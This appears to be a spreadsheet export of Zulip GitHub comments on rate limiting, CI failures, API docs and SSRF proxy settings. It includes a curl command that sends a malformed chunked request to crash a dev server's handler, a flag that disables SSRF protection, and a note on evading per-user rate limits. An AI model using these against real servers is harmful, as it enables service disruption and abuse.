    <t>&gt; Where should I put the TrelloWebhookException and other subclass in the file exception.py to remove it? What I was suggesting was completely removing that file and all of the involved exceptions and then replacing them with `UnexpectedWebhookEventType("Trello", action_type)` since that's just what they effectively are and since all of the other (newer) integrations code does it this way. &gt; I also want to know why continuous-integration/travis-ci/pr test failed when I had just changed the comment message. Also, it has passed the backend test on my laptop. This was what I found from that failure:. ~~~. dateutil_2.4.2-1_all.deb Could not connect to build-cache.travisci.net:80 (10.80.1.2), connection timed out. Dec 20 14:30:07 . Dec 20 14:30:07 E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing? Dec 20 14:30:07 Notice: Finished catalog run in 84.11 seconds. Dec 20 14:30:08 . Dec 20 14:30:08 Zulip installation failed (exit code 1)! Dec 20 14:30:08 . Dec 20 14:30:08 The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. The command "mispipe "./tools/ci/$TEST_SUITE" ts" exited with 1. ~~~. This means that this wasn't your fault. It was a networking issue on Travis's side and you can re-trigger the build by just running `git commit --amend` on your last commit (without making any new changes) and then just force pushing back to this branch. By amending your last commit (doing the above will just update the commit timestamp) and then pushing, GitHub/Travis will think that you made a change and this will re-trigger a build.</t>
  </si>
  <si>
    <t>@timabbott . &gt; OK I think we need to make sure passing request as a positional argument works since that's how Django 2.2's test suite does it. That's how it was done, but the merged auth rate limiting PR messed that up when this change was rebased on the new master (which was the case in your Django 2.2 migration). It's rebased correctly now - this required adjusting the rate limiter to expect the request in the positional argument instead of a kwarg. The commits I pushed here fix come issues that popped up in tests on Django 2.2 that can be merged into the current master in a compatible way. From my research it looks like the ``is_safe_url`` migration is actually doable like this. See the commit and compare the function code between Django versions:. https://docs.djangoproject.com/en/1.11/_modules/django/utils/http/ and https://docs.djangoproject.com/en/2.2/_modules/django/utils/http/</t>
  </si>
  <si>
    <t>avoiding polls</t>
  </si>
  <si>
    <t>Thanks for the suggestion. I don't think this is a feature we want to add as described; even if it were, there's no agreement in the development community about where we'd show these pinned polls. We can discuss more in chat.zulip.org, but it's definitely not ready to be worked on, and quite possibly not how we want to address the user problem of avoiding polls getting lost in the history.</t>
  </si>
  <si>
    <t>@hashirsarwar Thanks for working on this! I would personally prefer the approach that I outline here:. https://chat.zulip.org/#narrow/stream/3-backend/topic/rate.20limiting/near/825247. We should also see what some other folks think there. I do think the most challenging piece of this may be writing tests, so there's opportunity to get started on that. If the tests are written correctly, they should be able to work for any implementation that we choose here. Because rate limiting is inherently related to the passage of time, we'll want to be careful about either mocking time or structuring the API so that time values get passed in.</t>
  </si>
  <si>
    <t>@timabbott It's only the last commit with bad syntax, that's not meant for. review, only briefly shows the tornado rate limiter should be added. https://github.com/zulip/zulip/pull/14091 has a more complete. implementation attempt built on this. The other commits should each work. and be ready for review. On Mon, Mar 9, 2020 at 9:29 PM Tim Abbott &lt;notifications@github.com&gt; wrote:. &gt; OK, that makes sense re: KEY_PREFIX. This seems to have some syntax. &gt; errors; I'll wait for you to fix that before doing another review. &gt;. &gt; —. &gt; You are receiving this because you were mentioned. &gt; Reply to this email directly, view it on GitHub. &gt; &lt;https://github.com/zulip/zulip/pull/14110?email_source=notifications&amp;email_token=AKXMCMED3JBHQSRUVT7XEILRGVNUZA5CNFSM4LCREJZKYY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOEOI6G2I#issuecomment-596763497&gt;,. &gt; or unsubscribe. &gt; &lt;https://github.com/notifications/unsubscribe-auth/AKXMCMFAN4W5IONUAYQDUEDRGVNUZANCNFSM4LCREJZA&gt;. &gt; . &gt;.</t>
  </si>
  <si>
    <t>avoid polluting</t>
  </si>
  <si>
    <t>I posted a couple of comments above. I'm also now wondering whether we would be better off just using `request.user` for this purpose, with an `isinstance(UserProfile)` check on it in the logging code? . It's not clear to me that we actually need a separate field for it; the only reason we might is if we think it's important for views calling `do_login()`, where the user changes from not-logged-in to logged-in to avoid changing `request.user` part-way through, and we might want to avoid polluting the Django-built-in `request.user` field in the case. I think based on that argument, we should support a separate field, but maybe we could only use the separate field as an override in the rare code paths like `do_login` where `request.user` doesn't already have the data we want?</t>
  </si>
  <si>
    <t>@Sjord Could you provide steps to reproduce this reliably? I'm not able to reproduce so far - I'm hitting the rate limits and things are getting logged as expected</t>
  </si>
  <si>
    <t>It turns out the rate limiting was a red herring. Sorry about that. The actual trigger is requests with invalid syntax. The following curl command triggers this exception in the developer console for me:. curl -X POST -H 'Transfer-Encoding : chunked' --data-binary 'a' 'http://zulipdev.com:9991/json/messages/57'</t>
  </si>
  <si>
    <t>ar. + rm -rf zulip-server-testtar. + tar -tf /tmp/tmp.K7XFphx4th/zulip-server-testtar.tar. + grep -q -e '^zerver/tests'. + cd /home/tabbott/zulip. + git checkout-index -f -a --prefix /tmp/tmp.K7XFphx4th/zulip-server-testtar/. + ./tools/cache-zulip-git-version. + mv zulip-git-version /tmp/tmp.K7XFphx4th/zulip-server-testtar/. + cd /tmp/tmp.K7XFphx4th/zulip-server-testtar. + ln -s /home/tabbott/zulip/zulip-py3-venv . + mkdir -p var/log. + cat. + cat. + ./tools/update-prod-static. Using cached node modules from /srv/zulip-npm-cache/c18d6cee3155e6013068b5a7f785e30f09ca6a0a/node_modules. + ./tools/setup/emoji/build_emoji. build_emoji: Using cached emojis from /srv/zulip-emoji-cache/2a8798306d68e75ed7d6e2f23f2376b0f048ec88/emoji. + ./scripts/setup/inline_email_css.py. + ./tools/setup/generate_zulip_bots_static_files.py. + ./tools/setup/build_pygments_data. + ./tools/webpack --quiet. Starting webpack compilation. + ./manage.py collectstatic --no-default-ignore -v0 --noinput -i assets -i emoji-styles -i html -i js -i styles -i templates. + ./manage.py compilemessages -v0. fatal: not a git repository (or any of the parent directories): .git. + find prod-static/serve/generated/emoji/images/emoji/ -regex '.*\.[0-9a-f]+\.png' -delete. + echo cfd67a4da38972255f53bbca933ae8df3f1dfad1. + echo testtar. + cd /tmp/tmp.K7XFphx4th. + tar --append -f /tmp/tmp.K7XFphx4th/zulip-server-testtar.tar zulip-server-testtar/prod-static zulip-server-testtar/build_id zulip-server-testtar/version zulip-server-testtar/zulip-git-version zulip-server-testtar/locale zulip-server-testtar/staticfiles.json zulip-server-testtar/templates/zerver/emails/compiled zulip-server-testtar/webpack-stats-production.json. + rm -rf zulip-server-testtar. + gzip /tmp/tmp.K7XFphx4th/zulip-server-testtar.tar. + set +x. Generated /tmp/tmp.K7XFphx4th/zulip-server-testtar.tar.gz. ```. There's a few things that are likely worth fixing here. @amanagr can you test this in `upgrade-zulip-from-git` and post the output from there?</t>
  </si>
  <si>
    <t>slowly update</t>
  </si>
  <si>
    <t>@neiljp @gnprice thoughts on changing this? I think we'd probably have to go with sending `op` and `operation` with the latter being deprecated, and then slowly update clients with the usual API_FEATURE_LEVEL process.</t>
  </si>
  <si>
    <t>Good point. I am just saying that when IP rate limiting the APIs required by the public web views, we should keep NAT in mind.</t>
  </si>
  <si>
    <t>@timabbott Made changes to have a separate rule for IP rate limits. I think that limit should be lower than the user limits, or we'd give unauthed users more "power" in that context than logged in users, which seems wrong - so I set it to half the amount of requests logged in users are allowed. Also added rate limit for remote servers with a big limit of 1000 requests per minute, but I don't have a feel for whether that's the right amount. There's one more thing that might be worth giving some thought - with the current implementation, we run only `rate_limit_user` code for a logged in user. Meaning, a user can hit their limit, log out and then have their IP limit available to them. If we consider this troublesome, we could do something like:. ```. if isinstance(user, UserProfile):. try:. rate_limit_ip(request, ip_addr). except RateLimited:. # Ignore the exception because we only call the above function. # to increase the request counter for the IP, but the decision to block the request. # should only be based on the by-user limit. pass. rate_limit_user(request, user). ```. This is more robust, but more complicated, so not sure what's right here.</t>
  </si>
  <si>
    <t>Merged, thanks @mateuszmandera! We should probably have rate limiting by server UUID, with very generous limits; is that hard to add?</t>
  </si>
  <si>
    <t>Note that I’m taking these measurements on a beefy desktop (8 core/16 thread, 32 GB), simply because that’s the system I have with the most *consistent* performance for benchmarking (e.g. no random throttling from laptop thermals and power management). The absolute memory usage varies significantly with the amount of parallelism webpack detects it can use.</t>
  </si>
  <si>
    <t>Upon second inspection, this can't be done easily, this is how RateLimitedMiddleware processes the exception:. ```. def process_exception(self, request: HttpRequest,. exception: Exception) -&gt; Optional[HttpResponse]:. if isinstance(exception, RateLimited):. # secs_to_freedom is passed to RateLimited when raising. secs_to_freedom = float(str(exception)). resp = json_error(. _("API usage exceeded rate limit"),. data={'retry-after': secs_to_freedom},. status=429,. ). resp['Retry-After'] = secs_to_freedom. return resp. return None. ```. What cannot be expressed via JsonableError:. 1. ` data={'retry-after': secs_to_freedom}` because `data` from a `JsonableError` is constructed from the `data_fields` class attribute:. ```. @property. def data(self) -&gt; Dict[str, Any]:. return dict(((f, getattr(self, f)) for f in self.data_fields),. code=self.code.name). ```. So `retry-after` can't be accomplished through this due to the hyphen - we would have to change to `retry_after` or make the method above more fiddly to deal with this special case. 2. `resp['Retry-After'] = secs_to_freedom` - JsonableError would have to be extended to allow setting headers. We can extend JsonableError to deal with these problems, but at this point, it's probably better to just keep the exception processing in RateLimitMiddleware?</t>
  </si>
  <si>
    <t>api/get-user-by-email). * [Update a user](/api/update-user). * [Create a user](/api/create-user). * [Deactivate a user](/api/deactivate-user). * [Reactivate a user](/api/reactivate-user). +* [Deactivate own user](/api/deactivate-own-user). * [Set "typing" status](/api/set-typing-status). * [Get user presence](/api/get-user-presence). * [Get attachments](/api/get-attachments). diff --git a/zerver/openapi/python_examples.py b/zerver/openapi/python_examples.py. index 6b25f5c9db..9d241e5347 100644. --- a/zerver/openapi/python_examples.py. +++ b/zerver/openapi/python_examples.py. @@ -394,16 +394,17 @@ def get_profile(client: Client) -&gt; None:. . @openapi_test_function("/users/me:delete"). def deactivate_own_user(client: Client, owner_client: Client) -&gt; None:. -. user_id = client.get_profile()["user_id"]. +. # {code_example|start}. - # Deactivate the profile of the user/bot that requests this endpoint,. - # which is `client` in this case:. + # Deactivate the account of the current user/bot that requests. result = client.call_endpoint(. url="/users/me",. method="DELETE",. ). # {code_example|end}. +. + # Reactivate the account to avoid polluting other tests. owner_client.reactivate_user_by_id(user_id). validate_against_openapi_schema(result, "/users/me", "delete", "200"). . diff --git a/zerver/openapi/zulip.yaml b/zerver/openapi/zulip.yaml. index e449f14874..db526abaf7 100644. --- a/zerver/openapi/zulip.yaml. +++ b/zerver/openapi/zulip.yaml. @@ -4555,7 +4555,12 @@ paths:. operationId: deactivate_own_user. tags: ["users"]. description: |. - Delete the requesting user from the realm. + Deactivates the user's account. See also the administrative endpoint for. + [deactivating another user](/api/deactivate-user). +. + `DELETE {{ api_url }}/v1/users/me`. +. + This endpoint is primarily useful to Zulip clients providing a user settings UI. responses:. "200":. description: Success. ```. However, I have one code cleanup thing I need you to fix before it's ready (will comment inline).</t>
  </si>
  <si>
    <t>So, I just reviewed the PR. First, let me tell you how I checked the PR. I started the server, opened localhost:9991, and then open dev tools -&gt; network, and there changed to no throttling to offline. Now, as I send any message, the same message that is being locally echoed (meaning just shown offline to the user, the message sent has failed), is copied into the compose box. Let me add the video here for better understanding. ![testing_server](https://user-images.githubusercontent.com/56730716/113791571-99a0b480-9761-11eb-95d2-358fe5a9b69f.gif). For the testing of the server-side problem, I switched off the server and it working as you said. Storing the last message in the compose box. This part is working fine, but the above case isn't. I get the problem, there isn't any proper condition with which we can find the difference between the two cases. So, some other issue is being created by the PR :(</t>
  </si>
  <si>
    <t xml:space="preserve"> we think this key belongs in the secrets file; I think I agree that it should be here rather than in the secrets file, since it is not a secret. * Troubleshooting details around e.g. "invalid API key" belong on the self-hosting page, not /help/ -- since they're not something an end user can do anything about. I think I may have only deleted it and not added it in the other place, though -- please check :). * The API docs changelog incorrectly mentioned `GET /events`; should be `POST /register` for a new `page_params` field. The following things I noticed still need attention:. - [x] I think the /help article heading/filename should mention GIPHY and/or animated GIFs; I tried doing `Animated GIFs from GIPHY` as the heading. If you like that, please update the filename, links, etc. - [x] We should look into https://developers.giphy.com/docs/sdk#data-collection -- does their JS library phone home? We will at least want to document that fact if so. . Aman: Since we are not sending a unique id for each user, for GIPHY to track any user data it has to use IP address from which request is coming which we don't control anyway. Also, the giphy-js library doesn't seem to be tracking any user info. It just sends and receives data for us. - [x] We should probably plan to add a setting to disable the GIPHY integration for an organization. I think we might want this to be a dropdown, with the options being "GIPHY integration disabled" as well as supporting rating options (https://github.com/Giphy/giphy-js/blob/master/packages/fetch-api/README.md#shared-options). . Aman: Ok. - [x] For the /integrations docs, I think it's probably better, rather than including the content, to just link to the Help Center article + have the nice screenshot. integrations/doc/email the most similar integration we have. - [x] I think we should do ~300ms as the rate-limit, not 500ms, for the throttling, to match our standard animation time. I think we're probably only 1-2 round trips from merging this.</t>
  </si>
  <si>
    <t>This lgtm aside from:. * The heading issue in https://github.com/zulip/zulip/pull/18239#discussion_r621318085. * Whether we want to setup a directory in zulip.com/dist with copies of `prod_settings_template.py` to avoid the GitHub API rate limits (which could reasonably be a follow-up project to let us merge this).</t>
  </si>
  <si>
    <t>Thank you very much for your response :). Yeah, as someone who likes development it's awesome to use API endpoints and the Zulip API is very powerful. But if you're not good at development, it would be great if you can select groups of users in the UI with checkboxes and change their roles at once. :). The slack data got migrated from your staff, because we're moved from slack to zulip as an open source project. I had no control over the export/import according to your "import from slack" documentation. :(. Update:. It's not that easy to do it in python. I run easily against the rate limit. `{'result': 'error', 'msg': 'API usage exceeded rate limit', 'code': 'RATE_LIMIT_HIT', 'retry-after': 32.03943347930908}`. Means I need to figure out how to handle it. Or just wait and rerun my code. Of course if I would develop a professional bot I would handle the response. But since I wrote the code only once to initial bulk fix the user roles, I just rerun it each time I hit the limit.</t>
  </si>
  <si>
    <t>I agree the API process isn't ideal, and we'll probably eventually do something for bulk role changes / deactivations, but I wanted to unblock folks by documenting what's possible now. If it's in Zulip Cloud, emailing support is a good way to get help (they could have easily done the role changes during the import process, and can do so now in bulk without rate limits if need be).</t>
  </si>
  <si>
    <t>Ah, found the trace. ## Query string. Key | Value. -- | --. `api_key` | [redacted]. `stream` | [redacted]. `topic` | [redacted]. ## Body. (this is presumably the parsed form of the `multipart/form-data`). &lt;table&gt;. &lt;tr&gt;. &lt;th&gt; Key &lt;/th&gt; &lt;th&gt; Value &lt;/th&gt;. &lt;/tr&gt;. &lt;tr&gt;. &lt;td&gt;&lt;code&gt;content&lt;/code&gt;&lt;/td&gt;. &lt;td&gt;. ```. Message:. From:. ```. &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;. ## Headers. Key | value. -- | --. `Accept-Encoding` | `gzip, deflate`. `Content-Length` | `178`. `Content-Type` | `multipart/form-data; boundary=--------------------------780381918857007658710229`. -----. Sadly, I don't have any more "raw" version of the request than that, but hopefully that helps.</t>
  </si>
  <si>
    <t>Ah, good find - this allowed finding an actual test bug in these find_account and create_realm tests where `.clear_history()` was getting called on the default domain instead of the appropriate one - thus completely failing to clear the rate limiting record. Fixed that as prep commits and merging now.</t>
  </si>
  <si>
    <t>`clear_auth_rate_limit_history` seems pretty good. If I were to split hairs, I think I'd go with `reset_authentication_attempt_count` or something; the word "history" implies it's maybe more of a durable log, and not a number, that's being cleared. And naming it based on wording that the user sees (authentication attempt) vs the underlying mechanism (rate limit) may make it more discoverable and specific. @mateuszmandera: Any thoughts on the naming?</t>
  </si>
  <si>
    <t>It's probably simpler for demo orgs to be Zulip Free, both implementation-wise and for avoiding special exceptions in the places where we have higher rate limits for paid organizations (in anti-abuse code paths).</t>
  </si>
  <si>
    <t xml:space="preserve"> __exit__. raise dj_exc_value.with_traceback(traceback) from exc_value. File "/srv/zulip-venv-cache/cc77818846b328558cc9444c67cbbe0121ca80f4/zulip-py3-venv/lib/python3.8/site-packages/django/db/backends/utils.py", line 84, in _execute. return self.cursor.execute(sql, params). File "/home/zulip/deployments/2021-09-27-21-30-05/zerver/lib/db.py", line 34, in execute. return wrapper_execute(self, super().execute, query, vars). File "/home/zulip/deployments/2021-09-27-21-30-05/zerver/lib/db.py", line 19, in wrapper_execute. return action(sql, params). django.db.utils.ProgrammingError: column zerver_realm.add_emoji_by_admins_only does not exist. LINE 1: ...otifications", "zerver_realm"."mandatory_topics", "zerver_re... ^. Traceback (most recent call last):. File "./scripts/restart-server", line 56, in &lt;module&gt;. subprocess.check_call(["./manage.py", "fill_memcached_caches"]). File "/usr/lib/python3.8/subprocess.py", line 364, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['./manage.py', 'fill_memcached_caches']' returned non-zero exit status 1. Traceback (most recent call last):. File "/home/zulip/deployments/2021-09-27-21-30-05/scripts/lib/upgrade-zulip-stage-2", line 311, in &lt;module&gt;. subprocess.check_output(["./scripts/restart-server", "--fill-cache"], preexec_fn=su_to_zulip). File "/usr/lib/python3.8/subprocess.py", line 415, in check_output. return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,. File "/usr/lib/python3.8/subprocess.py", line 516, in run. raise CalledProcessError(retcode, process.args,. subprocess.CalledProcessError: Command '['./scripts/restart-server', '--fill-cache']'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Any ideas for how to fix this?</t>
  </si>
  <si>
    <t>Just a note observed from the documentation PR (https://github.com/zulip/zulip/pull/20298): We may want to make a version of these limits apply to avatars as well. (Or if we decide it's fine to not do so, we should change the docs). We also need to think about making sure custom emoji on this front as well (both being accessible and rate limits).</t>
  </si>
  <si>
    <t>Resolved conflict, working on avatar and custom emoji rate limit.</t>
  </si>
  <si>
    <t>@mateuszmandera can you review this one? I think you may be better equipped to review rate limiting logic than I am at this point :).</t>
  </si>
  <si>
    <t>14:57:48.971 INFO [zr] 127.0.0.1 GET 200 3ms (+start: 14ms) /user_avatars/17/emoji/images/still/7.png (2056@zulip via Mozilla). 2021-12-07 14:57:48.978 INFO [zr] 127.0.0.1 GET 200 4ms (+start: 17ms) /user_avatars/17/emoji/images/7.gif (2056@zulip via Mozilla). 2021-12-07 14:57:49.568 INFO [zr] 127.0.0.1 GET 200 2ms (+start: 15ms) /user_avatars/17/emoji/images/still/7.png (2056@zulip via Mozilla). 2021-12-07 14:57:50.632 INFO [zr] 127.0.0.1 GET 200 2ms (+start: 13ms) /user_avatars/17/emoji/images/7.gif (2056@zulip via Mozilla). 2021-12-07 14:57:51.277 INFO [zr] 127.0.0.1 GET 200 2ms (+start: 12ms) /user_avatars/17/emoji/images/still/7.png (2056@zulip via Mozilla). 2021-12-07 14:57:51.649 INFO [zr] 127.0.0.1 GET 200 2ms (+start: 12ms) /user_avatars/17/emoji/images/7.gif (2056@zulip via Mozilla). 2021-12-07 14:57:52.262 INFO [zr] 127.0.0.1 GET 200 2ms (+start: 13ms) /user_avatars/17/emoji/images/still/7.png (2056@zulip via Mozilla). 2021-12-07 14:57:52.946 INFO [zr] 127.0.0.1 GET 200 2ms (+start: 16ms) /user_avatars/17/emoji/images/7.gif (2056@zulip via Mozilla). 2021-12-07 14:57:53.399 INFO [zr] 127.0.0.1 GET 200 2ms (+start: 23ms) /user_avatars/17/emoji/images/still/7.png (2056@zulip via Mozilla). 2021-12-07 14:57:53.406 INFO [zr] 127.0.0.1 GET 200 3ms (+start: 17ms) /user_avatars/17/emoji/images/7.gif (2056@zulip via Mozilla). 2021-12-07 14:57:56.101 INFO [zr] 127.0.0.1 GET 200 4ms (+start: 17ms) /user_avatars/17/emoji/images/7.gif (2056@zulip via Mozilla). 2021-12-07 14:57:56.128 INFO [zr] 127.0.0.1 GET 200 3ms (+start: 16ms) /user_avatars/17/emoji/images/still/7.png (2056@zulip via Mozilla). ```. &lt;/details&gt;. That's a network request every time an emoji is animated/stops animating, so on a slow connection, here's the experience on a slow network ie using chrome network throttling: (Slow 3G):. &lt;details&gt;. &lt;summary&gt;. gif with slow network. &lt;/summary&gt;. ![](https://user-images.githubusercontent.com/33805964/145056225-23486919-dcd0-42a2-8801-017b60c20d11.gif). &lt;/details&gt;</t>
  </si>
  <si>
    <t>The workaround above removes all SSRF provided by Smokescreen -- hence the "unsafe" in `--unsafe-allow-private-ranges`. Do not blindly add it to the command line without understanding the risks. If there's only a single IP address which is required, you can add `--allow-address 10.11.12.13` to the command line. _(edit: fixed the parameter name)_. This isn't a sufficient solution in general; we still need to develop such. That will probably take the form of adding a non-puppet-controlled Smokescreen configuration file in `/etc/zulip` which Smokescreen respects.</t>
  </si>
  <si>
    <t>Do you have suggestions on how we can make clearer how to configure this correctly, in https://zulip.readthedocs.io/en/latest/production/deployment.html#customizing-the-outgoing-http-proxy ? And as I mentioned, we currently don't use the proxy setting for camo, because it accomplishes what we were implicitly assuming the proxy setting to be for, which is to protect against SSRF. Your use case makes sense, and we should support opting camo into using the proxy, but 4.8 does not currently support it.</t>
  </si>
  <si>
    <t>Agreed, closing this -- the right fix is to have the frontend detect a rate limiting except via the 429 status code and provide a special error message there. (This change would make EVERY rate limited exception display that text, regardless of whether it's related to changing email)</t>
  </si>
  <si>
    <t>rate limited</t>
  </si>
  <si>
    <t>c8cb62a91e35be58fe0fdf94671a025f/zulip-py3-venv/lib/python3.8/site-packages/django/conf/__init__.py", line 217, in __init__. mod = importlib.import_module(self.SETTINGS_MODULE). File "/usr/lib/python3.8/importlib/__init__.py", line 127, in import_module. return _bootstrap._gcd_import(name[level:], package, level). File "&lt;frozen importlib._bootstrap&gt;", line 1014, in _gcd_import. File "&lt;frozen importlib._bootstrap&gt;", line 991, in _find_and_load. File "&lt;frozen importlib._bootstrap&gt;", line 975, in _find_and_load_unlocked. File "&lt;frozen importlib._bootstrap&gt;", line 671, in _load_unlocked. File "&lt;frozen importlib._bootstrap_external&gt;", line 848, in exec_module. File "&lt;frozen importlib._bootstrap&gt;", line 219, in _call_with_frames_removed. File "/home/zulip/deployments/2024-02-27-11-20-47/zproject/settings.py", line 27, in &lt;module&gt;. from .computed_settings import * # noqa: F403 isort: skip. File "/home/zulip/deployments/2024-02-27-11-20-47/zproject/computed_settings.py", line 74, in &lt;module&gt;. SECRET_KEY = get_mandatory_secret("secret_key"). File "/home/zulip/deployments/2024-02-27-11-20-47/zproject/config.py", line 44, in get_mandatory_secret. raise ZulipSettingsError(f'Mandatory secret "{key}" is not set'). zproject.config.ZulipSettingsError: Mandatory secret "secret_key" is not set. Traceback (most recent call last):. File "/home/zulip/deployments/2024-02-27-11-20-47/scripts/lib/upgrade-zulip-stage-2", line 264, in &lt;module&gt;. subprocess.check_call(. File "/usr/lib/python3.8/subprocess.py", line 364, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['/home/zulip/deployments/2024-02-27-11-20-47/scripts/lib/check-database-compatibility']'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</si>
  <si>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&gt; I think it'd be better to figure out why spamming those keyboard shortcut freezes the app and try to fix the underlying issues -- they could very well be performance leaks that affect regular use in a more subtle way. My bad! It was just hitting the rate limit. 😶‍🌫️</t>
  </si>
  <si>
    <t>This is great, huge thanks for doing this refactoring @PIG208! I added a couple refactoring commits that I think make both of the extracted decorator functions easier to read and understand, and marked this merge to once CI confirms I didn't mess anything up. @mateuszmandera for post-commit review of this as our rate limiter maintainer; it seems not unlikely there's some additional cleanup opportunities available on top of this.</t>
  </si>
  <si>
    <t>I think it's worth noting in the commit message that the first commit is not strictly a refactor because the order of operations does get changed (the rate limiting logic gets run earlier - before this it was only called once the view function finally got called, since we were decorating it) - but after thinking about it a bunch I think it's safe enough, I don't see anything that would break because of it. Hypothetically this would be an issue if this lead to a bug where authentication gets called **after** the rate limiting logic, leading to the `UserProfile`-rate-limiting not getting applied - but these changes look correct to me so that shouldn't happen. So looks good to me.</t>
  </si>
  <si>
    <t>I'm feeling that rate limiting refactoring can be done in a separate PR. We might probably remove `rate_limit` and add a `should_rate_limit` helper. For each view we should know exactly which rate limit function to call, so the all-in-one `rate_limit` won't be necessary. Further, we can remove `remote_server` from `RequestNotes`, since no one needs access to it via the request object anymore.</t>
  </si>
  <si>
    <t>-308,6 +308,9 @@. . &lt;h2 id="response"&gt;Response&lt;/h2&gt;. &lt;h4 id="example-responses"&gt;Example response(s)&lt;/h4&gt;. +&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: If any parameters sent in the request are not supported. +by this endpoint, a successful JSON response will include. +an &lt;a href="/api/rest-error-handling#ignored-parameters"&gt;ignored_parameters_unsupported&lt;/a&gt; array.&lt;/p&gt;. &lt;p&gt;A typical successful JSON response may look like:&lt;/p&gt;. &lt;div class="codehilite" data-code-language="JSON"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;. &lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;"msg"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;""&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;. diff -r -B -u current_api_html/rest-error-handling.html new_api_html/rest-error-handling.html. --- current_api_html/rest-error-handling.html	2023-02-20 16:28:31.067810337 +0100. +++ new_api_html/rest-error-handling.html	2023-02-20 16:27:41.463450641 +0100. @@ -351,6 +351,45 @@. &lt;p&gt;When the Zulip server has configured multiple rate limits that apply. to a given request, the values returned will be for the strictest. limit.&lt;/p&gt;. +&lt;h2 id="ignored-parameters"&gt;Ignored Parameters&lt;/h2&gt;. +&lt;p&gt;All Zulip REST API endpoints may return an array of parameters sent. +in the request that are not supported by that specific endpoint.&lt;/p&gt;. +&lt;p&gt;While this can be expected, e.g. when sending both current and legacy. +names for a parameter to a Zulip server of unknown version, this often. +indicates either a bug in the client implementation or an attempt to. +configure a new feature while connected to an older Zulip server that. +does not support said feature.&lt;/p&gt;. +&lt;p&gt;&lt;strong&gt;Changes&lt;/strong&gt;:&lt;/p&gt;. +&lt;ul&gt;. +&lt;li&gt;. +&lt;p&gt;Added to all REST API endpoint JSON success responses in Zulip 7.0. + (feature level 164)&lt;/p&gt;. +&lt;/li&gt;. +&lt;li&gt;. +&lt;p&gt;Added to. + &lt;a href="/api/update-subscription-settings"&gt;&lt;code&gt;POST /users/me/subscriptions/properties&lt;/code&gt;&lt;/a&gt;. + in Zulip 5.0 (feature level 111).&lt;/p&gt;. +&lt;/li&gt;. +&lt;li&gt;. +&lt;p&gt;Added to. + &lt;a href="/api/update-rea</t>
  </si>
  <si>
    <t>I did a pretty substantial revision on the strings; I think I'm happy with this version; @alexmv @mateuszmandera it'd be great to have another review on this. I probably added at least one typo :/. I added a link to the /api/ documentation page on rate limiting error codes; we probably want to cross-link that, but might be easiest to do that in a follow-up PR, because CI will fail if we try to add links to a page that doesn't exist on ReadTheDocs yet.</t>
  </si>
  <si>
    <t>This looks good for the backend part. I think the other thing we'll want to do is adjust the frontend logic to retry after a timeout response from the server, or notify the user to do that. Do you know what symptom a user will see with a timeout here? Might be easy to check on a test production server by setting the `uwsgi` `harikiri` limit (aka per-request timeout at that layer) to 1s and adding a 5s sleep to the view function for this API endpoint. Finally, let's write down an API change / feature level update for this, since I can imagine the mobile apps wanting to have different logic depending on whether a server has this commit or not.</t>
  </si>
  <si>
    <t>@timabbott Added a feature level bump, plus some description in the changelog and zulip.yaml. Also pushed an extra commit with a retry mechanism in the frontend, though I'm not sure if that's a good way to do it? We don't seem to have examples of similar retries in our code that i could base this on. When `harakiri` happens, the server return `502` to the browser. So with this commit, the behavior is that the browser will repeat these requests until the full topic is gone or until the rate limit gets hit - then the browser gets `429` and it will stop. Here's a recording of the user experience, with `batch_size` modified to `2`, `harakiri` after 3 seconds and the `delete_topic` logic altered to sleep for 4 seconds after a batch (to cause the request to time out):. [Screencast from 20.09.2022 22:11:26.webm](https://user-images.githubusercontent.com/45007152/191359944-8a025f40-b0f5-4b5b-b483-ea2a72f3505b.webm).</t>
  </si>
  <si>
    <t>Hi, So I tried throttling the network speeds on the local dev env to simulate a bad connection (15 Kbit/s, upload and download + 1000ms latency), and I did not notice anything wrong. Could you elaborate more on this?</t>
  </si>
  <si>
    <t>See our [documentation on rate-limiting](https://zulip.readthedocs.io/en/latest/production/security-model.html#rate-limiting). From the last bullet point there:. &gt; - If a user runs into the rate limit for login attempts, a server administrator can clear this state using the `manage.py reset_authentication_attempt_count` [management command](https://zulip.readthedocs.io/en/latest/production/management-commands.html). Can you tell us where you looked in the documentation before asking here, so we can update those places?</t>
  </si>
  <si>
    <t>Thanks for looking into this. Couldn't we just disable settings.RATE_LIMITING in a context manager, say `with @override_settings`? I don't know if that works correctly outside the test suite, but it seems like it might. I worry that this kind of surgery on the rate limiting dictionary is hard to make robust, and if it isn't robust, the failure modes are likely to be strange, hard to debug issues...</t>
  </si>
  <si>
    <t>Update: Our gmail smtp server eventually rate limited us too, so even other routes that use send_email like forgot password was temporarily down. The invite link route however was still returning a Rate Limited Error. We have for now changed our smtp server to one of our self hosted mail servers and temporarily turned RateLimit within zullip to False, just to allow new users to join for the time being. .</t>
  </si>
  <si>
    <t>Rate Limited</t>
  </si>
  <si>
    <t>A lot of Zulip's limits are intended to protect the ability of the Zulip server to send outgoing email in the presence of someone attempting to send spam. We have a global rate limit across "All things that send email" for a given Zulip organization, and that's probably what you hit; but as you noted, the SMTP provider will end up rate limiting you if Zulip doesn't. I assume you deactivated the invite link in question: https://zulip.com/help/invite-new-users#manage-pending-invitations. https://zulip.readthedocs.io/en/stable/production/security-model.html#rate-limiting has configuration options you can adjust that are safer than disabling all rate limiting. We can use https://chat.zulip.org/#narrow/stream/31-production-help/topic/Spam.20.26.20Rate.20Limit.20issue.20.2324242/near/1500208 to discuss if there's any changes Zulip can make here.</t>
  </si>
  <si>
